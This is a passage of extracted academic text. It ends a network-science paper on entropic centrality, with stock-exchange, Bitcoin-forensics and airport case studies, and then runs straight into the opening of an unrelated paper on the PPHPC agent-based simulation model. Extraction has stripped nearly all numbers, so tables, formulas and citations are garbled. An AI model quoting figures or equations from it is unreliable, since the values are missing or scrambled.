of influence via flow propagation, together with a quantitative edge differentiation. the above approaches ignore any other information such as the market size share of the organizations. arguably, between two organizations with identical position in the graph, the one with larger market size may be deemed to have larger influence on the other nodes. this is modeled by the scaled entropic centrality ch(u)fu, where fu is the market size in percentage. we notice that this indeed creates a distinct relative ranking (indicated by subscript in table , for example, arfz is ranked rd as per weighted entropic centrality). particularly, among the top seven companies as per ch(u), we see that only prds continues to be in the same (fourth) rank. knrx has the largest change in ranking, up from sixth to second. while the scaled entropic centrality ranking of the top two nodes are congruent with the ranking based solely on the scale factor (market size), we see that arfz , which would be ranked th by market size, and first by solely network effect, is ranked rd when both factors are taken into account. we compare the entropic centrality ch,p with respect to the alpha, katz and pagerank centralities (using the reverse edge direction). note that the unweighted graph has for largest eigenvalue λ ' . (so λ ' . ). the ranking results for the most central entities from the tehran stock exchange, and the overall kendall tau rank correlation coefficients kendall ( ) are reported in tables and respectively. the kendall tau coefficient indicates the rank correlation among a pair or ranked lists (see schoch, valente & brandes, for a discussion on why kendall tau is preferred to pearson). the entity is outstandingly central with respect to all metrics but weighted betweenness. the alpha and katz centralities yield very similar results, but they rank the entity as third instead of second. they rank second the entity . 
a likely explanation could be that that actually has a higher out-degree (and thus a higher in-degree in the reversed edge network) than entity . the top most central entities have mostly a betweenness (ranked ), and are mostly ranked pretty low with respect to both versions of pagerank, weighted and unweighted. the most central entity for the weighted betweenness is , which is one of the most central with respect to in-degree (it has an in-degree of ). then and are second respectively for the unweighted and weighted pagerank. entity has out-neighbors , , , , which become in-neighbors in the reversed edge graph, neither itself nor its neighbors stand out by their degrees, however has for in-neighbors in the reversed edge graph , , , , , , and both and are very central with respect to in-degree, making it easier to explain why it is ranked high. note that the assortativity coefficient of this graph is≈− . , so this is a non-assortative graph, where high degree nodes do not particularly connect to neither high nor low degree nodes. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table kendall rank correlation coefficient τκ across the centralities for the tehran stock exchange. ch,p alpha pagerank (uw) pagerank (w) katz (α = . ) α = . α = . (α = . ) ch,p . . . . alpha . . . . pagerank(uw) . . . . pagerank(w) . . . . katz . . . . the kendall rank correlation confirms that the entropic centrality differs from the other metrics not only to decide the most central vertices but also overall. the kendall coefficient for unweighted betweenness has not been reported since only vertices have a non-zero betweenness. this shows that the graph considered is far from being strongly connected. overall, comparison points illustrate that the entropic centrality ch,p provides a new perspective not captured by the other algorithms. we next consider the same graph but where edge directionality is reversed. a node becomes central if it owns diverse companies, which themselves may in turn own various companies. since owning shares could be used to influence an organization’s management, the entropic centrality based on reverse edges is thus a proxy indicator of how much control a specific entity has over the other entities in the market. organizations with very high entropic centralities using either sense of edge direction could then be seen as probable candidates causing structural risks—be it by being ‘too big to fail’, or having too much control over significant portions of the market for it to be fairly competitive. the nodes with highest entropic centrality are shown in table . the most important one is the government: we expect it to be one of the most important players in iran when it comes to owning shares in other companies (and yet not to appear in the list when the original edge direction is considered). we see a higher correlation between entropic centrality and in-degree than there was between entropic centrality and out-degree in table . among the seven most central nodes, five of them are having one of the highest in-degrees, the two most central nodes have themselves one high degree neighbor. then node has a fairly low in-degree, but it is connected to node . in summary, the case study of the tehran stock exchange network exhibits three important intertwined aspects of our model. firstly, it is flexible. 
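the pairwise ranking comparisons reported in the tables here (kendall's tau between centrality score vectors) can be sketched as follows. this is an illustrative python snippet assuming networkx and scipy are available; the graph is a placeholder rather than the tehran data, and the out-degree scores only stand in for the entropic centrality scores defined above.

import networkx as nx
from scipy.stats import kendalltau

# placeholder directed weighted graph standing in for the shareholding network
g = nx.DiGraph()
g.add_weighted_edges_from([(1, 2, 0.4), (2, 3, 0.2), (3, 1, 0.1),
                           (1, 3, 0.3), (4, 1, 0.5)])

nodes = list(g.nodes())
pagerank = nx.pagerank(g, weight="weight")
katz = nx.katz_centrality_numpy(g, alpha=0.05)
# the entropic centrality of this paper would be computed here; out-degree is
# only a stand-in to show the comparison step
entropic = dict(g.out_degree())

tau, _ = kendalltau([pagerank[v] for v in nodes],
                    [entropic[v] for v in nodes])
print("kendall tau between pagerank and the stand-in entropic scores:", tau)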
it seamlessly captures the effect of relationships, considered either in a binary fashion (just the structure), or quantified with relative strengths (the skew in strength of the relationships), while it can also accommodate information which is intrinsic to the node but somewhat disentangled from the network (used as a scale factor). second, reversing the edge direction gives a dual perspective. finally, we see that we obtain different results and corresponding insights, based on which variations of the model is applied for a specific study. naturally, figuring it out the best variation is done on a case-by-case basis. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a subgraph of the bitcoin subgraph, which comprises only addresses that have non-zero en- tropic centrality. those in red are listed in table , with the highest entropic centrality. full-size doi: . /peerjcs. /fig- a bitcoin subgraph our final case study is a subgraph of the bitcoin wallet address network derived from bitcoin transaction logs (see fig. ). bitcoin is a cryptocurrency (nakamoto, ), and transactions (buy and sell) among users of this currency are stored and publicly available in a distributed ledger called blockchain. user identities are unknown, but each user has one or many wallet addresses, that are identifiers in every transaction. then one transaction record amalgamates the wallet addresses of possibly several payers and payment receivers, together with the transaction amounts. to be more precise, consider two bitcoin transactions t and t . the transaction t has n inputs, from wallet addresses a ,...,an, of amounts i ,...,i n respectively. the outputs, of amounts o ,...,o m go to wallet addresses c ,...,cm respectively. the sum of inputs equals the sum of outputs and any transaction fees (say τ ), i.e., |t |= ∑n k= i k =τ + ∑m l= o l. for the sake of simplicity, we will ignore the transaction fees (i.e., consider τ = ). a similar setting holds for transaction t , where the same wallet address a appears again as part of the inputs, together with some wallet addresses b ,...,bn′ which may or not oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table addresses with highest entropic centrality in the bitcoin subgraph above (with the respective relative ranks as per other centralities— alpha/katz with α = . (ak), pagerank (pr), weighted (w) and unweighted (u)) and with highest centrality when edges have reverse direc- tionality below. address ch,p fu out fuch ak pr (u/w) cd qw fjgtwkq pj nty wzavkzinom . . / pjb ghfrd uqs hv n wt i mzp wke . . / eab ndg wj wr uvwqirtmzwaa rqk s . . / myqqj lbde u drsadprkxwobvza ugaw . . / mmqxz knqfmecjlw atdygfwxvvnjfg . . / xzf ys sbqnakyna ybckyzwn sezau . . / p c jpf oxhgxqt vgmrccbev yepadum . . / fp ejyy fsj y kb vrjjunteuvysuq . . / q spycn szquoqygahkgdhc ynrsrfrw . . / a ngsmr whvnj gaj cm y kfe i . . / ce juqn rh ysdb vvshoyymzlpkcqaaa . . / qbsjfhwkbgznmuhmuhdczpazns pme . . / kdgkr qov ws wpnaa rhjce n uevys . . / nxabcfqwejszbqfwcynwgqml wwoe rk . . / address ch,p fu in pjb ghfrd uqs hv n wt i mzp wke . . eab ndg wj wr uvwqirtmzwaa rqk s . . hwpb m vxdn kvss rsmnrqqjlhxvyn . . c pdyzjrdqomyywdheqx huyoyqogygdv . . zksvrsduux e mmnvvba c esfnvvdfa . . intersect with a ,...,an. 
by design, bitcoin transactions do not retain an association as to which specific inputs within a transaction are used to create specific outputs. suppose one would like to create a derived address network from some extract of the bitcoin logs of transactions, that is a graph whose nodes are bitcoin wallet addresses, and edges are directed and weighted. there should be an edge from address u to address v if there is at least one transaction where some amount of bitcoin is going from u to v. however as explained above, it is not always possible to disambiguate the input–output pairs. if the input amounts are particularly mutually distinct, and so are the output amounts, and there are input–output amounts that match closely, one might be able to make reasonable guess about matching a specific input to a specific output. in general, in absence of such particular information, one heuristic is to model the input–output association probabilistically. a common heuristic (kondor et al., ) is to consider that based on transaction t there is an edge from a to each of c ,...,cm. the same holds for transaction t . thus in the derived address network, there will be an edge from a to each of the c ,...,cm,d ,...,dm′. if some outputs x,...,z are in common to both transaction outputs, there is a single edge between a and each of the addresses x,...,z. the derived address network gives us the graph to be analyzed, whose vertices are wallet addresses and edges are built as above. originally, a given wallet address is sending oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. bitcoins to possibly different output wallet addresses within one transaction, and the same wallet address may be involved in different transactions, with possible reoccurences of the same output addresses (this is the case of a which is an input to both transactions t and t and x,...,z appear as output transactions in both). in the split-and-transfer flow model, we can incorporate this information into the derived address network by assigning the probabilities q({c ,...,cm})= i i +i and q({d ,...,dm′})= i i +i with which the respective subsets {c ,...,cm} and {d ,...,dm′} of the set {c ,...,cm,d ,...,dm′} of neighbors of a are used. other choices for q(x) are possible, the rationale for this specific choice is to use a probability that is proportional to the amount of bitcoin injected by a in each of the transactions. edge weights in the derived address network are computed as follows. let |t |= ∑m k= o k and |t |= ∑m′ k= o k denote the total amounts involved in each of the transactions. for an edge between a and cl, which happens in t , it is ωc ,...,cm(a ,cl)= o l |t | , while for an edge between a and dl, which happens in t , it is ωd ,...,dm′(a ,dl)= o l |t | . we thus have m∑ l= ωc ,...,cm(a ,cl)= m∑ l= o l |t | = , m′∑ l= ωd ,...,dm′(a ,dl)= m′∑ l= o l |t | = . if some node pairs, and thus edges, repeat across transactions (for example, a to x,...,z in our example), these edge weights should cumulate in the overall derived address network. this is captured by the formula ( ) which is here instantiated as fa ,x =q({c ,...,cm})ωc ,...,cm(a ,x)+q({d ,...,dm′})ωd ,...,dm′(a ,x) = i i +i o x |t | + i i +i o x |t | where in transaction t the output to address x is o x, while it is o x in transaction t . in a departure from previous works that derive the address network in a manner explained above kondor et al. 
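a small python sketch of this derivation step (illustrative only; addresses and amounts are made up, and transaction fees are ignored as in the text) computes, for one payer address, the equivalent edge probabilities of formula ( ) by weighting each funded transaction by the payer's input share and splitting it proportionally to the output amounts:

from collections import defaultdict

def derived_edge_probabilities(transactions, payer):
    """edge probabilities from `payer` to output addresses: each funded
    transaction is one event, chosen with probability proportional to the
    payer's input amount, and within the event the flow splits
    proportionally to the output amounts."""
    funded = [t for t in transactions if payer in t["inputs"]]
    total_in = sum(t["inputs"][payer] for t in funded)
    f = defaultdict(float)
    for t in funded:
        q_event = t["inputs"][payer] / total_in      # q(outputs of t)
        t_total = sum(t["outputs"].values())
        for addr, amount in t["outputs"].items():
            f[addr] += q_event * amount / t_total    # omega_X(payer, addr)
    return dict(f)

# two made-up transactions sharing the input address "a1"
transactions = [
    {"inputs": {"a1": 3.0, "a2": 1.0}, "outputs": {"c1": 2.5, "c2": 1.5}},
    {"inputs": {"a1": 1.0, "b1": 2.0}, "outputs": {"c2": 2.0, "d1": 1.0}},
]
print(derived_edge_probabilities(transactions, "a1"))  # sums to 1 over outputs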
( ), our graph model is able to retain the information that subsets of edges co-occur, or not, as displayed above. for that reason, the bitcoin address network is a natural candidate (and in fact, part of the inspiration) for the general flow model with arbitrary splits and transfers as considered in this paper, where individual flows may go through a subset of outgoing edges. for our experiments, we choose a bitcoin subgraph appearing in the investigation of wallet addresses involved in extorting victims of ashley-madison data breach (see oggier, phetsouvanh & datta, a for accessing the data). it is obtained by extracting a subgraph of radius (if the graph were undirected) around the wallet address g wbtl gwkudyjnyvmpixtqagktlrmv. while we would like to emphasize that we use here this bitcoin graph to explore the entropic centrality model, it may still be worth mentioning that one identified suspect node from another of our study (phetsouvanh, oggier & datta, ), namely node hwpb m vxdn kvss rsmnrqqjlhxvyn , has high enough entropic centrality to be listed (see table below) as a top entropic centrality node. thus, the entropic centrality analysis can be used as a tool to identify nodes of interest, and to create a shortlist of nodes to be investigated further in detail, in the context of bitcoin forensics. oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table kendall rank correlation coefficient τκ across the centrality algorithms for the bitcoin sub- graph dataset (excluding nodes which all had an entropic centrality score of zero). ch,p fuch,p alpha pagerank pagerank katz (α = . ) (uw) (w) (α = . ) ch,p . . . . . fuch,p . . . . . alpha . . . . . pagerank(uw) . . . . . pagerank(w) . . . . . katz . . . . . tables and compare the entropic centrality ch,p with other centralities. with respect to scaled entropic centrality, there is a large variation in the weightages associated with the edges, which has a significant impact on the relative rankings between scaled/unscaled entropic centralities. with respect to weighted betweenness, only three addresses are relevant, they are, with their respective in- and out-degree, eab ndg wj wr uvwqirtmzwaa rqk s (ranked , in-degree: , out-degree: ), pjb ghfrd uqs hv n wt i mzp wke (ranked , in-degree: , out-degree: ), and cd qw fjgtwkq pj nty wzavkzinom (in-degree: , out-degree: ). the other addresses are ranked (corresponding to a betweenness of ). the graph has for largest eigenvalue λ ' . and λ ' . . as with the previous cases, alpha and katz centralities are very close to each other, they also agree more closely with ch,p on the most central addresses, but table shows that this is not the case in general. the trends shown by the kendall rank correlation coefficient is similar to previous cases: there are more dissimilarities between pagerank and entropic centralities than between alpha/katz and entropic centralities, but overall, entropic centralities give a different view point, as would be expected by extrapolating borgatti’s view point. the assortativity coefficient of the illustrated bitcoin subgraph is≈− . , suggesting a slight disassortativity. this is easily explained as an artefact of the way the subgraph was extracted (a small radius around a node), yielding a couple of hubs with nodes connected only to them (leaves). in this example, these leaves are having an entropic centrality influenced by having these hubs as their first neighbors. 
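assortativity figures such as the ones quoted here can be obtained with standard tooling; the snippet below is illustrative only, with a random graph standing in for a subgraph loaded from the data.

import networkx as nx

# stand-in graph; in practice g would be the bitcoin (or airport) subgraph
g = nx.gnp_random_graph(200, 0.02, directed=True, seed=1)
# degree assortativity: negative values indicate a disassortative network,
# i.e., high-degree nodes tend to connect to low-degree ones
print(nx.degree_assortativity_coefficient(g))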
as a last scenario, we consider the small network of maine airports, with their connecting flights, for a total of airports (see oggier, phetsouvanh & datta, b for accessing the data.). we created the network based on flights involving passenger for the period of january as per the data obtained from the united states department of transportation bureau of transportation statistics website (https: //www.transtats.bts.gov/dl_selectfields.asp?table_id= ). in table , we synopsize the kendall’s tau coefficient τκ. the lower the value of this coefficient, the closer (similar) two ranked lists are. we see that ch,unif produces results which are very similar to alpha and katz centralities, but ch,p yields a reasonably distinct result instead. furthermore, results from both pagerank applied to both weighted and unweighted graphs are most distinct both with respect to entropic centralities, as well oggier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.transtats.bts.gov/dl_selectfields.asp?table_id= https://www.transtats.bts.gov/dl_selectfields.asp?table_id= http://dx.doi.org/ . /peerj-cs. table kendall rank correlation coefficient τκ across the centrality algorithms for the airports net- work data. uniform non-uniform alpha pagerank pagerank katz (α = . ) (uw) (w) (α = . ) uniform entropic . . . . . non-uniform entropic . . . . . alpha . . . . pagerank(uw) . . . . . pagerank(w) . . . . . katz . . . . as the other existing centralities explored in our experiments. the assortative coefficient is ≈− . , this is thus a disassortative network. indeed it contains two airports that serve as hubs, and small airports connected to it (or important airports whose edges have been cut when extracting the specific subgraph). in terms of entropic centrality, this corresponds to having small airports inheriting the influence of being connected to hubs. conclusions in this paper, we studied the concept of entropic centrality proposed by tutzauer ( ), which originally determined the importance of a vertex based on the extent of dissemination of an indivisible flow originating at it, by considering the uncertainty in determining its destination. we extended this concept to model divisible flows, which better reflect certain real world phenomenon, for instance, flows of money. in fact, one of the motivating scenarios that prompted us to study this model was to study the network induced by bitcoin transactions—though, in the course of the work, and to validate the model, we also identified and analyzed other use cases, with arbitrary divisions of the flow. a previous work which considered only equitable divisions of the flow was shown to be a special case of the general model studied in this paper. the flow based entropic centrality model bears in spirit some similarity with eigenvector based centrality measures in the sense that the importance of vertex node is determined by taking into account a transitive effect, namely, connections to a central vertex contributes to increase the centrality. we thus compared our approach with several representatives of this family, specifically alpha centrality, pagerank and katz centrality. we observed that alpha and katz centralities are closer to entropic centralities than pagerank (in terms of kendall tau distance), but they are still fairly different. 
this could be extrapolated from the view point of borgatti ( ), which advocates to use path based centrality for transfer type of flow, and not eigenvector based centralities, which are best suited for duplication. this indicates that the new entropic centrality provides novelty not only in the principled manner in which it captures the phenomenon of divisible flows, but also in terms of the results and associated insights obtained from it.

additional information and declarations

funding. the work of phetsouvanh silivanxay was supported by an ntu singapore scholarship for doing his phd. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures. the following grant information was disclosed by the authors: ntu singapore scholarship.

competing interests. anwitaman datta is an academic editor for peerj.

author contributions. • frédérique oggier conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • silivanxay phetsouvanh performed the experiments, prepared figures and/or tables, performed the computation work, approved the final draft. • anwitaman datta conceived and designed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft.

data availability. the following information was supplied regarding data availability: the tehran stock exchange dataset came from dastkhan h, gharneh ns, determination of systematically important companies with cross-shareholding network analysis: a case study from an emerging market, international journal of financial studies; the authors can be contacted at nshams@aut.ac.ir for the dataset. the bitcoin dataset from the bitcoin transactions log is available at oggier, frederique elise; phetsouvanh, silivanxay; datta, anwitaman, "a node directed weighted bitcoin address subgraph", dr-ntu (data). the maine airport network dataset is available at oggier, frederique elise; phetsouvanh, silivanxay; datta, anwitaman, "maine airport network in january", dr-ntu (data).

supplemental information. supplemental information for this article can be found online.

references

benzi m, klymko c. on the limiting behavior of parameter-dependent network centrality measures. siam journal on matrix analysis and applications.
bonacich p. factoring and weighting approaches to status scores and clique identification. journal of mathematical sociology.
bonacich p, lloyd p. eigenvector-like measures of centrality for asymmetric relations. social networks.
borgatti sp. centrality and network flow. social networks.
dastkhan h, gharneh ns. determination of systematically important companies with cross-shareholding network analysis: a case study from an emerging market. international journal of financial studies.
estrada e. the structure of complex networks: theory and applications. oxford: oxford university press.
fan r, xu k, zhao j. a gpu-based solution for fast calculation of the betweenness centrality in large weighted networks. peerj computer science.
iannelli f, mariani ms, sokolov im. influencers identification in complex networks through reaction-diffusion dynamics. physical review e.
katz l. a new status index derived from sociometric analysis. psychometrika.
kendall mg. a new measure of rank correlation. biometrika.
kondor d, pósfai m, csabai i, vattay g. do the rich get richer? an empirical analysis of the bitcoin transaction network. plos one.
migliore m, martorana v, sciortino f. an algorithm to find all paths between two nodes in a graph. journal of computational physics.
nakamoto s. bitcoin: a peer-to-peer electronic cash system.
newman mej. mathematics of networks. in: the new palgrave dictionary of economics. london: palgrave macmillan uk.
nikolaev ag, razib r, kucheriya a. on efficient use of entropy centrality for social network analysis and community detection. social networks.
oggier f, phetsouvanh s, datta a (a). a node directed weighted bitcoin address subgraph. in: dataverse.
oggier f, phetsouvanh s, datta a (b). maine airport network in january. in: dataverse.
oggier f, silivanxay p, datta a. entropic centrality for non-atomic flow network. in: international symposium on information theory and its applications (isita). piscataway: ieee.
opsahl t, agneessens f, skvoretz j. node centrality in weighted networks: generalizing degree and shortest paths. social networks.
page l, brin s, motwani r, winograd t. the pagerank citation ranking: bringing order to the web. stanford: stanford infolab.
phetsouvanh s, oggier f, datta a. egret: extortion graph exploration techniques in the bitcoin network. in: ieee icdm workshop on data mining in networks (damnet). piscataway: ieee.
schoch d, valente tw, brandes u. correlations among centrality indices and a class of uniquely ranked graphs. social networks.
tutzauer f. entropy as a measure of centrality in networks characterized by path-transfer flow. social networks.
towards a standard model for research in agent-based modeling and simulation submitted august accepted november published november corresponding author nuno fachada, nfachada@laseeb.org academic editor feng gu additional information and declarations can be found on page doi . /peerj-cs. copyright fachada et al. distributed under creative commons cc-by . open access towards a standard model for research in agent-based modeling and simulation nuno fachada, vitor v. lopes, rui c. martins and agostinho c. rosa institute for systems and robotics, larsys, instituto superior técnico, universidade de lisboa, lisboa, portugal universidad de las fuerzas armadas-espe, sangolquı́, ecuador life and health sciences research institute, school of health sciences, university of minho, braga, portugal abstract agent-based modeling (abm) is a bottom-up modeling approach, where each entity of the system being modeled is uniquely represented as an independent decision-making agent. abms are very sensitive to implementation details. thus, it is very easy to inadvertently introduce changes which modify model dynamics. such problems usually arise due to the lack of transparency in model descriptions, which constrains how models are assessed, implemented and replicated. in this paper, we present pphpc, a model which aims to serve as a standard in agent based modeling research, namely, but not limited to, conceptual model specification, statistical analysis of simulation output, model comparison and parallelization studies. this paper focuses on the first two aspects (conceptual model specification and statistical analysis of simulation output), also providing a canonical implementation of pphpc. the paper serves as a complete reference to the presented model, and can be used as a tutorial for simulation practitioners who wish to improve the way they communicate their abms. subjects agents and multi-agent systems, scientific computing and simulation, theory and formal methods keywords agent-based modeling, standard model, statistical analysis of simulation output, odd introduction agent-based modeling (abm) is a bottom-up modeling approach, where each entity of the system being modeled is uniquely represented as an independent decision-making agent. when prompted to act, each agent analyzes its current situation (e.g., what resources are available, what other agents are in the neighborhood), and acts appropriately, based on a set of rules. these rules express knowledge or theories about the respective low-level components. the global behavior of the system is the result from the simple, self-organized local relationships between the agents (fachada, ).
as such, abm is a useful tool in simulating and exploring systems that can be modeled in terms of interactions between individual entities, e.g., biological cell cultures, ants foraging for food or military units in a battlefield (macal & north, ). in practice, abm can be considered a variation of discrete-event simulation, since state changes occur at specific points in time (law, ). how to cite this article fachada et al. ( ), towards a standard model for research in agent-based modeling and simulation. peerj comput. sci. :e ; doi . /peerj-cs. mailto:nfachada@laseeb.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. spatial agent-based models (sabms) are a subset of abms in which a spatial topology defines how agents interact (shook, wang & tang, ). for example, an agent may be limited to interact with agents located within a specific radius, or may only move to a near physical or geographical location (macal & north, ). sabms have been extensively used to study a range of phenomena in the biological and social sciences (isaac, ; shook, wang & tang, ). abms are very sensitive to implementation details: the impact that seemingly unimportant aspects such as data structures, algorithms, discrete time representation, floating point arithmetic or order of events can have on results is tremendous (wilensky & rand, ; merlone, sonnessa & terna, ). as such, it is very easy to inadvertently introduce changes which will alter model dynamics. these type of issues usually derive from a lack of transparency in model descriptions, which constrains how models are assessed and implemented (müller et al., ). conceptual models should be well specified and adequately described in order to be properly implemented and replicated (edmonds & hales, ; wilensky & rand, ). the odd protocol (overview, design concepts, details) is currently one of the most widely used templates for making model descriptions more understandable and complete, providing a comprehensive checklist that covers virtually all the key features that can define a model (grimm et al., ). it allows modelers to communicate their models using a natural language description within a prescriptive and hierarchical structure, aiding in model design and fostering in-depth model comprehension (müller et al., ). it is the recommended approach for documenting models in the comses net computational model library (rollins et al., ). however, müller et al. ( ) argue that no single model description standard can completely and throughly characterize a model by itself, suggesting that besides a structured natural language description such as odd, the availability of a model’s source code should be part of a minimum standard for model communication. furthermore, the odd protocol does not deal with models from a results or simulation output perspective, which means that an additional section for statistical analysis of results is often required. in practice, however, the situation is very different. while many abms have been published and simulation output analysis is a widely discussed subject matter (sargent, ; kelton, ; law, ; nakayama, ; law, ), comprehensive inquiries concerning the output of abm simulations are hard to find in the scientific literature. 
in this paper, we present pphpc (predator-prey for high-performance computing), a conceptual model which captures important characteristics of sabms, such as agent movement and local agent interactions. it aims to serve as a standard in agent based modeling research, and was designed with several goals in mind: . provide a basis for a tutorial on complete model specification and thorough simulation output analysis. . investigate statistical comparison strategies for model replication (fachada et al., a). fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. . compare different implementations from a performance point of view, using different frameworks, programming languages, hardware and/or parallelization strategies, while maintaining statistical equivalence among implementations (fachada et al., b). . test the influence of different pseudo-random number generators (prngs) on the statistical accuracy of simulation output. this paper aims to fulfill the first of these goals, and is organized as follows. first, in ‘background,’ we review several paradigmatic abms, as well as model description and analysis. next, the ‘methodology’ section is divided into five subsections, in which we: (a) formalize the conceptual model using the odd protocol; (b) describe the canonical pphpc realization implemented with the netlogo abm toolkit (wilensky, ); (c) discuss how to select output focal measures; (d) explain how to collect and prepare data for statistical analysis; and, (e) propose how to analyze focal measures from a statistical point-of-view. in ‘results’, statistical analysis of output of the netlogo implementation is performed. a discussion on how these results can be utilized in additional investigations is undertaken in ‘discussion’. ‘conclusions’ provides a global outline of what was accomplished in this paper. background several abms have been used for the purpose of modeling tutorials and/or model analysis and replication. probably, the most well known standard abm is the “stupidmodel,” which consists of a series of pseudo-models of increasing complexity, ranging from simple moving agents to a full predator-prey-like model. it was developed by railsback, lytinen & grimm ( ) as a teaching tool and template for real applications, as it includes a set of features commonly used in abms of real systems. it has been used to address a number of questions, including the comparison of abm platforms (railsback, lytinen & jackson, ; lytinen & railsback, ), model parallelization (lysenko & d’souza, ; tang & wang, ), analysis of toolkit feasibility (standish, ) and/or creating models as compositions of micro-behaviors (kahn, ). the “stupidmodel” series has been criticized for having some atypical elements and ambiguities (lytinen & railsback, ), reasons which lead isaac ( ) to propose a reformulation to address these and other issues. however, its multiple versions and user-interface/visualization goals limit the series appeal as a pure computational model for the goals described in the introduction. 
other paradigmatic models which have been recurrently used, studied and replicated include sugarscape (epstein & axtell, ; axtell et al., ; bigbee, cioffi-revilla & luke, ; d’souza, lysenko & rahmani, ; lysenko & d’souza, ), heatbugs (wilensky, ; sallach & mellarkod, ; goldsby & pancerella, ), boids (reynolds, ; reynolds, ; goldsby & pancerella, ) and several interpretations of proto- typical predator-prey models (smith, ; hiebeler, ; wilensky, ; tatara et al., ; ottino-loffler, rand & wilensky, ; ginovart, ). nonetheless, there is a lack of formalization and in-depth statistical analysis of simulation output in most of these implementations, often leading to model assessment and replication difficulties (edmonds fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. & hales, ; wilensky & rand, ). this might not come as a surprise, as most models are not implemented with replication in mind. many models are not adequately analyzed with respect to their output data, often due to improper design of simulation experiments. consequently, authors of such models can be at risk of making incorrect inferences about the system being studied (law, ). a number of papers and books have been published concerning the challenges, pitfalls and opportunities of using simulation models and adequately analyzing simulation output data. in one of the earliest articles on the subject, sargent ( ) demonstrates how to obtain point estimates and confidence intervals for steady state means of simulation output data using a number of different methodologies. later, law ( ) presented a state-of-the-art survey on statistical analyses for simulation output data, addressing issues such as start-up bias and determination of estimator accuracy. this survey was updated several times over the years, e.g., law ( ), where law discusses the duration of transient periods before steady state settles, as well as the number of replications required for achieving a specific level of estimator confidence. in kelton ( ), the author describes methods to help design the runs for simulation models and interpreting their output using statistical methods, also dealing with related problems such as model comparison, variance reduction or sensitivity estimation. a comprehensive exposition of these and other important topics of simulation research is presented in the several editions of “simulation modeling and analysis” by law and kelton, and its latest edition (law, ) is used as a starting point for the analysis described in ‘methodology’ and conducted in ‘results.’ methodology overview, design concepts and details of pphpc here we describe the pphpc model using the odd protocol (grimm et al., ). time-dependent state variables are represented with uppercase letters, while constant state variables and parameters are denoted by lowercase letters. the u(a,b) expression equates to a random integer within the closed interval [a,b] taken from the uniform distribution. purpose the purpose of pphpc is to serve as a standard model for studying and evaluating sabm implementation strategies. it is a realization of a predator-prey dynamic system, and captures important characteristics of sabms, such as agent movement and local agent interactions. the model can be implemented using substantially different approaches that ensure statistically equivalent qualitative results. 
implementations may differ in aspects such as the selected system architecture, choice of programming language and/or agent-based modeling framework, parallelization strategy, random number generator, and so forth. by comparing distinct pphpc implementations, valuable insights can be obtained on the computational and algorithmic design of sabms in general.

entities, state variables, scales

the pphpc model is composed of three entity classes: agents, grid cells and environment. each of these entity classes is defined by a set of state variables, as shown in the table below. all state variables explicitly assume integer values to avoid issues with the handling of floating-point arithmetic on different programming languages and/or processor architectures.

table: model state variables by entity. where applicable, the s and w designations correspond to prey (sheep) and predator (wolf) agent types, respectively.

entity        state variable                symbol          range
agents        type                          t               s, w
              energy                        E               non-negative integers
              horizontal position in grid   X               0, ..., x_env - 1
              vertical position in grid     Y               0, ..., y_env - 1
              energy gain from food         g^s, g^w        non-negative integers
              energy loss per turn          l^s, l^w        non-negative integers
              reproduction threshold        r^s_T, r^w_T    non-negative integers
              reproduction probability      r^s_P, r^w_P    0, ..., 100
grid cells    horizontal position in grid   X               0, ..., x_env - 1
              vertical position in grid     Y               0, ..., y_env - 1
              countdown                     C               0, ..., c_r
environment   horizontal size               x_env           positive integers
              vertical size                 y_env           positive integers
              restart                       c_r             positive integers

the t state variable defines the agent type, either s (sheep, i.e. prey) or w (wolf, i.e. predator). the only behavioral difference between the two types is in the feeding pattern: while prey consume passive cell-bound food, predators consume prey. other than that, prey and predators may have different values for other state variables, as denoted by the superscripts s and w. agents have an energy state variable, E, which increases by g^s or g^w when feeding, decreases by l^s or l^w when moving, and decreases by half when reproducing. when energy reaches zero, the agent is removed from the simulation. agents with energy higher than r^s_T or r^w_T may reproduce with probability given by r^s_P or r^w_P. the grid position state variables, X and Y, indicate which cell the agent is located in. there is no conceptual limit on the number of agents that can exist during the course of a simulation run.

instances of the grid cell entity class can be thought of as the place or neighborhood where agents act, namely where they try to feed and reproduce. agents can only interact with other agents and resources located in the same grid cell. grid cells have a fixed grid position, (X, Y), and contain only one resource, cell-bound food (grass), which can be consumed by prey, and is represented by the countdown state variable C. the C state variable specifies the number of iterations left for the cell-bound food to become available. food becomes available when C = 0, and when a prey consumes it, C is set to c_r. the set of all grid cells forms the environment entity, a toroidal square grid where the simulation takes place. the environment is defined by its size, (x_env, y_env), and by the restart parameter, c_r.

spatial extent is represented by the aforementioned square grid, of size (x_env, y_env), where x_env and y_env are positive integers. temporal extent is represented by a positive integer m, which represents the number of discrete simulation steps or iterations. spatial and temporal scales are merely virtual, i.e. they do not represent any real measure.
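to make the entity and state-variable structure above concrete, the following is a minimal python sketch of the three entity classes. it is purely illustrative (the paper's canonical implementation is in netlogo), and the class and field names are our own, not part of the model specification:

    from dataclasses import dataclass

    @dataclass
    class Agent:
        kind: str        # agent type t: "s" (prey/sheep) or "w" (predator/wolf)
        energy: int      # E: agent is removed from the simulation when it reaches zero
        x: int           # X: horizontal grid position, 0 .. x_env - 1
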